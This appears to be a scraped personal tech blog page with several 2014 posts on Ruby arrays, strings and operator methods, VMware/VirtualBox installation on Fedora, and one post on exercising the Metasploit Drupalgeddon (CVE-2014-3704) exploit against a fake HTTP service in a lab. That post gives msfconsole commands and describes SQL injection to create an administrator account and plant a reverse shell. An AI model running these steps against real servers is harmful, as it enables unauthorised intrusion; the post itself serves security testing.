2014年10月30日 星期四

[ 常見問題 ] How do you add an array to another array in Ruby

Source From Here
Question
Consider we have two array:
>> somearray = ["some", "thing"]
>> anotherarray = ["another", "thing"]

How do we append all elements in anotherarray into somearray without ugly for-loop and get:
>> somearray
["some","thing","another","thing"]

How-To
I'm doubtless forgetting some approaches, but you can concatenate:
Way1
>> a1 = ["some", "thing"]
=> ["some", "thing"]
>> a2 = ["another", "thing"]
=> ["another", "thing"]
>> a1.concat a2
=> ["some", "thing", "another", "thing"]
>> a1
=> ["some", "thing", "another", "thing"]
>> a2
=> ["another", "thing"]

Way2
>> a3 = a1+a2
=> ["some", "thing", "another", "thing"]
>> a1
=> ["some", "thing"]
>> a2
=> ["another", "thing"]

or push/unshift:
Way3:
>> a1.push(*a2)
=> ["some", "thing", "another", "thing"]
>> a1
=> ["some", "thing", "another", "thing"]
>> a2
=> ["another", "thing"]

Way4:
>> a2.unshift(*a1)
=> ["some", "thing", "another", "thing"]
>> a1
=> ["some", "thing"]
>> a2
=> ["some", "thing", "another", "thing"]

or slice:
Way5:
>> a1[a1.size,0]=a2
=> ["another", "thing"]
>> a1
=> ["some", "thing", "another", "thing"]
>> a2
=> ["another", "thing"]

Way6:
>> a1[a1.size..0]=a2
=> ["another", "thing"]
>> a1
=> ["some", "thing", "another", "thing"]
>> a2
=> ["another", "thing"]

Way7:
>> a1.insert(a1.length, *a2)
=> ["some", "thing", "another", "thing"]
>> a1
=> ["some", "thing", "another", "thing"]
>> a2
=> ["another", "thing"]

or append and flatten - Way8:
>> (a1 << a2).flatten! # a call to #flatten instead would return a new array


[ 文章收集 ] RB Learning - More On Strings

Source From Here
Preface
There are many methods in the String class (you don't have to memorize them all; you can look up the documentation) like the reverse that gives a backwards version of a string (reverse does not change the original string). length that tells us the number of characters (including spaces) in the string. upcase changes every lowercase letter to uppercase, and downcase changes every uppercase letter to lowercase. swapcase switches the case of every letter in the string, and finally, capitalize is just like downcase, except that it switches the first character to uppercase (if it is a letter), slice gives you a substring of a larger string.

The methods upcasedowncaseswapcase and capitalize have corresponding methods that modify a string in place rather than creating a new one: upcase!downcase!,swapcase! and capitalize!. Assuming you don't need the original string, these methods will save memory, especially if the string is large.

Listing all methods of a class or object
Shows you a list of methods that the Class object String responds to.
>> String.methods.sort
=> [:!, :!=, :!~, :<, :<=, :<=>, :==, :===, :=~, :>, :>=, :__id__, :__send__, :allocate, :ancestors, :autoload, :autoload?, :class, :class_eval, :class_exec, :class_variable_defined?, :class_variable_get, :class_variable_set, :class_variables, :clone, :com, :const_defined?, ...]

This method tells you all the instance methods that instances of String are endowed with.
>> String.instance_methods.sort
=> [:!, :!=, :!~, :%, :*, :+, :<, :<<, :<=, :<=>, :==, :===, :=~, :>, :>=, :[], :[]=, :__id__, :__send__, :ascii_only?, :between?, :bytes, :bytesize, :byteslice, :capitalize, :capitalize!, :casecmp, :center, :chars, ...]

With this method, you can view a class's instance methods without those of the class's ancestors.
>> String.instance_methods(false).sort
=> [:%, :*, :+, :<, :<<, :<=, :<=>, :==, :===, :=~, :>, :>=, :[], :[]=, :ascii_only?, :bytes, :bytesize, :byteslice, :capitalize, :capitalize!, :casecmp, :center, :chars, :chomp, :chomp!, :chop, ...]

Comparing two strings for equality
Strings have several methods for testing equality. The most common one is == (double equals sign). Another equality-test instance method, String.eql?, tests two strings for identical content. It returns the same result as ==. A third instance method, String.equal?, tests whether two strings are the same object. An example p013strcmp.rbillustrates this:
  1. # p013strcmp.rb    
  2. # String#eql?, tests two strings for identical content.    
  3. # It returns the same result as ==    
  4. # String#equal?, tests whether two strings are the same object    
  5. s1 = 'Jonathan'    
  6. s2 = 'Jonathan'    
  7. s3 = s1    
  8. if s1 == s2    
  9.   puts 'Both Strings have identical content'    
  10. else    
  11.   puts 'Both Strings do not have identical content'    
  12. end    
  13. if s1.eql?(s2)    
  14.   puts 'Both Strings have identical content'    
  15. else    
  16.   puts 'Both Strings do not have identical content'    
  17. end    
  18. if s1.equal?(s2)    
  19.   puts 'Two Strings are identical objects'    
  20. else    
  21.   puts 'Two Strings are not identical objects'    
  22. end    
  23. if s1.equal?(s3)    
  24.   puts 'Two Strings are identical objects'    
  25. else    
  26.   puts 'Two Strings are not identical objects'    
  27. end    
Using %w
Sometimes creating arrays of words can be a pain, what with all the quotes and commas. Fortunately, Ruby has a shortcut: %w does just what we want.
>> names1 = ['john', 'ken', 'mary']
=> ["john", "ken", "mary"]
>> puts names1[0]
john
=> nil

>> puts names1[2]
mary
=> nil

>> names2 = %w{ john ken mary}
=> ["john", "ken", "mary"]
>> puts names2[1]
ken
=> nil

Character Set
A character set, or more specifically, a coded character set is a set of character symbols, each of which has a unique numerical ID, which is called the character's code point.

An example of a character set is the 128-character ASCII character set, which is mostly made up of the letters, numbers, and punctuation used in the English language. The most expansive character set in common use is the Universal Character Set (UCS), as defined in the Unicode standard, which contains over 1.1 million code points.

The letter A, for example, is assigned a magic number by the Unicode consortium which is written like this: U+0041. A string "Hello" which, in Unicode, corresponds to these five code points:
U+0048 U+0065 U+006C U+006C U+006F

Just a bunch of code points. Numbers, really. We haven't yet said anything about how to store this in memory. That's where encodings come in.

Character Encoding
UTF-8 can be used for storing your string of Unicode code points, those magic U+ numbers, in memory using 8 bit bytes. In UTF-8, every code point from 0-127 is stored in a single byte. Only code points 128 and above are stored using 2, 3, in fact, up to 6 bytes. This has the neat side effect that English text looks exactly the same in UTF-8 as it did in ASCII.

It does not make sense to have a string without knowing what encoding it uses. Thus, if you have a string, you have to know what encoding it is in or you cannot interpret it or display it to users correctly. Ruby supports the idea of character encodings.

Encoding class
Objects of class Encoding each represent a different character encoding. The Encoding.list method returns a list of the built-in encodings.
>> Encoding.list
=> [#, #, #, #, ... ]

Ruby has a way of setting the encoding on a file-by-file basis using a new magic comment. If the first line of a file is a comment (or the second line if the first line is a #! shebang line), Ruby scans it looking for the string coding:. If it finds it, Ruby then skips any spaces and looks for the (case-insensitive) name of an encoding. Thus, to specify that a source file is in UTF-8 encoding, you can write this:
  1. # coding: utf-8  
As Ruby is just scanning for coding:, you could also write the following:
  1. # encoding: utf-8  
Supplement
[ Ruby Gossip ] Basic : 內建型態與操作 - 字串型態
Stackoverflow - how to convert character encoding with ruby 1.9
>> s = "Learn Objective\xE2\x80\x93C on the Mac"
=> "Learn Objective–C on the Mac"
>> s.encoding
=> #<Encoding:UTF-8>
>> s
=> "Learn Objective–C on the Mac"
>> s.force_encoding "ASCII-8BIT" force_encoding(encoding): Changes the encoding to encoding and returns self.
=> "Learn Objective\xE2\x80\x93C on the Mac"


[Toolkit] Simple Web Service - SimpleHttp.groovy - CVE:2014-3704

Preface 
Here we will tell how to use toolkit SimpleHttp.groovy to help us doing exploit CVE:2014-3704 from Metaexploit. Firstly, let's check our target CVE: 
The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conductSQL injection attacks via an array containing crafted keys.

The Drupal is an package provide content-management framework through HTTP service. The attacker can use target CVE which leverage SQL injection to create an account with administrator privilege and do what he or she wants. 

The exploit code from Metasploit is called Drupal HTTP Parameter Key/Value SQL Injection. When you read the code and you can observer below actions will be taken to exploit the target server: 
* Use CVE:2014-3704 to create an account with administrator privilege.
* Post a article which will use reversed shell for attacker to control the target server.

Toolkit Usage 
At current version of SimpleHttp.groovy, it should be used under MSFConsoleATF framework. And we will develop different HTTP handlers for each cve into single .groovy file and store it under path/ibm/iss/xf/tk/services/cve/http/. So in this case, there should be a groovy file called "CVE2014_3704_.groovy" into folder mentioned before. The  means different implementation for different attacking script. (For metasploit, the x=1

Start Http Service At Exploitable Target 
Please enter  and use below command to start Fake HTTP Service for CVE2014-3704: 
# ls # The content inside 
ibm libs poc scripts test
# groovy -cp "libs/*" ibm/iss/xf/tk/services/SimpleHttp.groovy CVE2014_3704_1 # Loading CVE2014_3704_1 handler
[Info] Listen on NIF=eth0: /172.16.58.50
[Info] Loading Handler='CVE2014_3704_1'...
[Info] WDir=/root/MSFConsoleATF...
[Info] Parsing class...
[Info] Create and register Handler...
[Test] Initialize...
[Info] Start Fake Http Service...

Run CVE-2014-6271 Through Metasploit 
Now let's move to Kali Linux. Please key-in "msfconsole" in the terminal console to enter the interface of MSF: 
# msfconsole
...
msf > // Now we are in MSF interface

Let's search our target cve: 
msf> search cve:2014-3704
...
exploit/multi/http/drupal_drupageddon 2014-10-15 excellent Drupal HTTP Parameter Key/Value SQL Injection
...

Next step is to use this exploit: 
msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon) >

Let's check how to use this exploit: 
msf exploit(drupal_drupageddon) > show options

Here we have to setup RHOST as the IP of host running Fake HTTP service and do the exploit: 
msf exploit(drupal_drupageddon) > set RHOST 172.16.58.50
RHOST => 172.16.58.50
msf exploit(drupal_drupageddon) > run # Start exploit
...
[*] 172.16.58.50:80 - Calling preview page. Exploit should trigger...

msf exploit(drupal_drupageddon) >

Let's back to Fake Http Server console and it record the all attacking behaviors: 


Supplement 
[Toolkit] Simple Web Service - SimpleHttp.groovy

2014年10月29日 星期三

[文章收集] How to Install, Run and Uninstall VMware Player and VirtualBox on Fedora Linux

Source From Here 
Preface 
VMware Player (download) and VirtualBox are two cool and free full virtualization solutions and both can run on top of a Linux host. In this post, we introduces how to install, run, and uninstall VMware Player and VirtualBox on Fedora Linux

VMware Player 
Install VMware Player 
Download the installation bundle from VMware’s website. For example, the file we download is: VMware-Player-6.0.3-1895310.x86_64.bundle (link

Install needed kernel header and devel packages 
# yum install kernel-headers kernel-devel

Run the bundle file 
# sh VMware-Player-6.0.3-1895310.x86_64.bundle

Then just follow the instruction of the GUI of the VMware installer, and you can finish the installation. 

Run VMware Player 
Just execute 
$ vmplayer

Start a virtual machine just by one command 
$ vmplayer /path/to/virtual/machine/config.vmx

Give the path to the virtual machine configuration file (a .vmx file under the virtual machine’s directory) to vmplayer as its parameter. 

Uninstall VMware Player 
VMware installer provides the method to uninstall VMware products. We can use this tool: 
# vmware-installer --uninstall-product vmware-player

It has a GUI and just follow its instruction to finish the uninstallation. 

VirtualBox 
Install VirtualBox 
We use VirtualBox’s repository for Fedora here. We use VirtualBox-4.1 as the example. Download the repository file. 
# cd /etc/yum.repos.d
# wget http://download.virtualbox.org/virtualbox/rpm/fedora/virtualbox.repo

Install VirtualBox using yum 
# yum install VirtualBox-4.1

Run VirtualBox 
Just execute 
$ virtualbox

Start a virtual machine just by one command 
# VBoxManage startvm name_of_the_virtual_machine

VBoxManager use the virtual machine’s name as its parameter. The name can be found from VirtualBox’s virtual machine list. 

Uninstall VirtualBox 
As installing VirtualBox, we can uninstall (erase) it using yum 
# yum erase VirtualBox-4.1

Supplement 
VMWare WorkStation 10 虛擬機器

[ Ruby Gossip ] Basic : 類別 - 特殊方法定義

Source From Here 
Preface 
在 Ruby 中可以定義特定操作或運算操作的行為,例如 initialize 可以定義建立實例之後初始化的流程,+、-、*、/、==等操作行為也可以使用方法定義,例如自行定義一個有理數類別: 
  1. # encoding: utf-8  
  2. class RationalNumber  
  3.     attr_accessor :numer, :denom  
  4.     def initialize(n, d) # 物件建立之後所要建立的初始化動作  
  5.         @numer = n  
  6.         @denom = d  
  7.     end  
  8.       
  9.     def to_s             # 定義物件的字串描述  
  10.         "#{@numer}/#{@denom}"  
  11.     end  
  12.       
  13.     def +(that)          # 定義 + 運算  
  14.         RationalNumber.new(self.numer * that.denom + that.numer * self.denom,   
  15.                      self.denom * that.denom)  
  16.     end  
  17.       
  18.     def -(that)          # 定義 - 運算  
  19.         RationalNumber.new(self.numer * that.denom - that.numer * self.denom,  
  20.                      self.denom * that.denom)  
  21.     end  
  22.       
  23.     def *(that)          # 定義 * 運算  
  24.         RationalNumber.new(self.numer * that.numer,   
  25.                      self.denom * that.denom)  
  26.     end  
  27.       
  28.     def /(that)          # 定義 / 運算  
  29.         RationalNumber.new(self.numer * that.denom,  
  30.                      self.denom * that.denom)  
  31.     end  
  32.       
  33.     def ==(that)          # 定義 == 運算  
  34.         self.numer * that.denom == that.numer * self.denom  
  35.     end  
  36. end  
  37.   
  38. x = RationalNumber.new(12)  
  39. y = RationalNumber.new(23)  
  40. z = RationalNumber.new(23)  
  41.   
  42. puts x       # 1/2  
  43. puts y       # 2/3  
  44. puts x + y   # 7/6  
  45. puts x - y   # -1/6  
  46. puts x * y   # 2/6  
  47. puts x / y   # 3/6  
  48. puts x == y  # false  
  49. puts y == z  # true  
initialize 定義物件建立後要執行的初始化過程。常見的+、-、*、/、==等操作,可分別由+、-、*、/、==等方法定義,呼叫這些方法時,可以不用.操作,而呼叫方法有Ruby中,括號可以視情況省略,因此看來就像是其它語言中的所謂的運算子。 

特殊方法定義 
self 代表(參考)至訊息接收者,實例方法中撰寫 self 時,self 代表(參考)至實例,也就是運算操作左邊的物件。to_s 用來定義傳回物件描述字串,通常用來描述的字串是對使用者友善的說明文字,有些方法會對物件呼叫 to_s 來取得物件的字串描述,像是 putsprint、p 等方法(irb 中也是使用 to_s 取得字串描述),如果雙引號字串中包括 \ 忽略(Escape)字元,puts 與 print 會忽略下一個字元,而 p 則不會忽略直接輸出。 

與 to_s 類似的是 to_str 方法,在運算操作時(例如串接字串)如果需要從物件取得字串,若沒有指定方法操作,則會呼叫 to_str 而不是 to_s。例如: 
 

上例中同時定義了 to_s 與 to_str可以清楚看到 irb 中使用的是 to_s,而串接字串時會使用 to_str。 

在某些操作場合,需要從物件取得陣列(例如串接陣列),若沒有指定方法操作,則通常預設會呼叫 to_ary。例如: 
 

實例變數的設值方法,可以使用 name= 來定義,其中 name 為實例變數名稱。類似地,[] 運算操作的行為,可用 [] 與 []= 方法來定義。例如: 
 

單元運算的方法名稱比較特殊,為運算字元後加上 @。例如: 
 

要注意,= 不能 使用方法定義,所以其它如 +=、-=... 等也不能使用方法定義,&& 與 || 具有捷徑運算,你也無法用方法定義,因此 & &= 與 ||= 也無法使用方法定義。可以使用方法定義的運算操作有 +、-、*、/、%、[]、[]=、<<、>>、==、 >、<、>=、<=、===、&、|、^、~、!。 

在 迭代器與程式區塊 中談過,可以為物件定義迭代器,如果某個物件上擁有 each 迭代方法,也就可以使用 for 語法。例如陣列就擁有 each 方法,可以使用 each 方法迭代元素,也可以使用 for 迭代元素. 一個簡單範例如下: 
 

Supplement 
Ruby tutorialspoint - Ruby Operators

[ Python 常見問題 ] How to shift a datetime object by 12 hours in python

Source From   Here   Question   Datetime   objects hurt my head for some reason. I am writing to figure out   how to shift a date time obje...